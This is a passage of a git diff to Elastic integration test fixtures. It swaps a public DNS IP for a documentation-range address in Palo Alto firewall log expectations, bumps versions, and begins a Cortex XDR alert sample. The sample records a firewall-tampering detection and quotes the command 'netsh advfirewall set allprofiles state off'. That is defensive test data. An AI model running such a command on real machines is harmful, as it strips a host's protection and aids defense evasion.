@@ -15795,14 +15927,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942197050Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031931400Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15825,27 +15957,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 94, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -15864,7 +15998,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15879,7 +16013,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -15901,7 +16035,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:mdksC4jGw6MN7g3nGdquiqQ95vU=" + "community_id": "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=" } }, "sequence_number": 32091207, @@ -15921,8 +16055,8 @@ ], "network": { "community_id": [ - "1:jKueIOIhkRRjHQyRO93QyuKEiP8=", - "1:mdksC4jGw6MN7g3nGdquiqQ95vU=" + "1:+EKGNDzaa2Gmys4Gdwo/EIwHp2s=", + "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=" ], "transport": "udp", "application": "dns", 
@@ -15962,14 +16096,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942200586Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031936800Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15992,27 +16126,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 170, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -16031,7 +16167,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16046,7 +16182,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16068,7 +16204,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+zC2Y+UE7UqApr01oqb755Xyuf4=" + "community_id": "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=" } }, "sequence_number": 32091208, @@ -16088,8 +16224,8 @@ ], "network": { "community_id": [ - "1:mci4o+GZJDLvZr11UdJH9bepPqU=", - "1:+zC2Y+UE7UqApr01oqb755Xyuf4=" + "1:4RiaH+n0JwxG6zcL26BuXxb9VkY=", + "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=" ], "transport": "udp", "application": "dns", 
@@ -16129,14 +16265,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942204098Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031942300Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -16159,27 +16295,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 94, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -16198,7 +16336,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16213,7 +16351,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16235,7 +16373,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:xawqUBgLyfe1E61ObEXv4nbO590=" + "community_id": "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=" } }, "sequence_number": 32091209, @@ -16255,8 +16393,8 @@ ], "network": { "community_id": [ - "1:Px8uRfOgVDuaWj/VKxjTwyAzHAM=", - "1:xawqUBgLyfe1E61ObEXv4nbO590=" + "1:IyD4gx5qjpc1VEbcmilQaH5vo9E=", + "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=" ], "transport": "udp", "application": "dns", 
@@ -16296,14 +16434,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942207620Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031947700Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -16326,27 +16464,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 94, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -16365,7 +16505,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16380,7 +16520,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16402,7 +16542,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4=" + "community_id": "1:lzFOPce/GJbHM86icsI0NMzcEUg=" } }, "sequence_number": 32091210, @@ -16422,8 +16562,8 @@ ], "network": { "community_id": [ - "1:6tSek5GUc9k56LSY4NgTMd0igd8=", - "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4=" + "1:CdL6dWgT+IMFe6ptUk1vLlpVL20=", + "1:lzFOPce/GJbHM86icsI0NMzcEUg=" ], "transport": "udp", "application": "dns", 
@@ -16463,14 +16603,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942211047Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031953Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -16493,27 +16633,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -16532,7 +16674,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16547,7 +16689,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16569,7 +16711,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:yNIHAg1M08IChho9000mtg7zUOc=" + "community_id": "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=" } }, "sequence_number": 32091211, @@ -16589,8 +16731,8 @@ ], "network": { "community_id": [ - "1:xl0u/+SYGciPtyPuv813G1aTEdI=", - "1:yNIHAg1M08IChho9000mtg7zUOc=" + "1:J9zizMWz2sU5dX8BXgKIQbfXqFU=", + "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=" ], "transport": "udp", "application": "dns", 
@@ -16630,14 +16772,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942214565Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031958300Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", diff --git a/packages/panw/manifest.yml b/packages/panw/manifest.yml index 4f8e8be2167..0ed7312882c 100644 --- a/packages/panw/manifest.yml +++ b/packages/panw/manifest.yml @@ -1,6 +1,6 @@ name: panw title: Palo Alto Networks Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect PAN-OS firewall monitoring logs from Palo Alto Networks devices with Elastic Agent. type: integration diff --git a/packages/panw_cortex_xdr/changelog.yml b/packages/panw_cortex_xdr/changelog.yml index 4fbf5e19ae0..5b24b1bec12 100644 --- a/packages/panw_cortex_xdr/changelog.yml +++ b/packages/panw_cortex_xdr/changelog.yml 
@@ -1,9 +1,14 @@ # newer versions go on top +- version: "0.2.5" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.4" changes: - description: Uniform with guidelines type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.3" changes: - description: Update Title and Description. diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json index 62b50ed44b5..7a8dcaaad14 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json 
@@ -588,7 +588,7 @@ "event": { "severity": 2, "reason": "Bioc Event", - "ingested": "2021-10-14T10:31:16.679953057Z", + "ingested": "2021-12-09T13:44:33.260263600Z", "original": "{\"external_id\":\"52517f58-0201-4d66-b5c4-00922664737e\",\"severity\":\"low\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1588792761983,\"local_insert_ts\":1588792547132,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":\"TAMPERING\",\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":[\"T1089 - Disabling Security Tools\"],\"mitre_tactic_id_and_name\":[\"TA0005 - Defense Evasion\"],\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":\"Windows 10 [10.0 (Build 17763)]\",\"agent_data_collection_status\":null,\"mac\":null,\"events\": {\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":\"AAABcetp1dDSqW1uAAY8Vw==\",\"event_type\":\"Registry Event\",\"event_timestamp\":1588792514182,\"actor_process_instance_id\":\"AdYj2qtgRtAAADjMAAAAAA==\",\"actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\",\"actor_process_image_name\":\"netsh.exe\",\"actor_process_command_line\":\"netsh advfirewall set allprofiles state off\",\"actor_process_signature_status\":\"Signed\",\"actor_process_signature_vendor\":\"Microsoft 
Corporation\",\"actor_process_image_sha256\":\"d70d165b6706c61c56f2ca91307f4bbdb9846acae1da3cfd84bf978ffb21af23\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_process_os_pid\":14540,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"causality_actor_process_execution_time\":1588792508244,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":\"0\",\"action_registry_key_name\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\",\"action_registry_value_name\":\"EnableFirewall\",\"action_registry_full_key\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\\\\EnableFirewall\",\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id
\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"os_actor_process_image_name\":\"svchost.exe\",\"os_actor_process_command_line\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k LocalServiceNoNetworkFirewall -p\",\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":\"N/A\",\"os_actor_process_image_sha256\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"os_actor_process_causality_id\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":\"1800\",\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":null,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},\"alert_id\":\"884236\",\"detection_timestamp\":1588792514182,\"name\":\"Windows Firewall disabled via Registry\",\"category\":\"Tampering\",\"endpoint_id\":\"98a86ba773fbe44f6b41ba2216fe2f53\",\"description\":[{\"pretty_name\":\"Registry\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"action 
type\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"action\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"action\"},{\"pretty_name\":\"Create Key\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Set Value\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"key 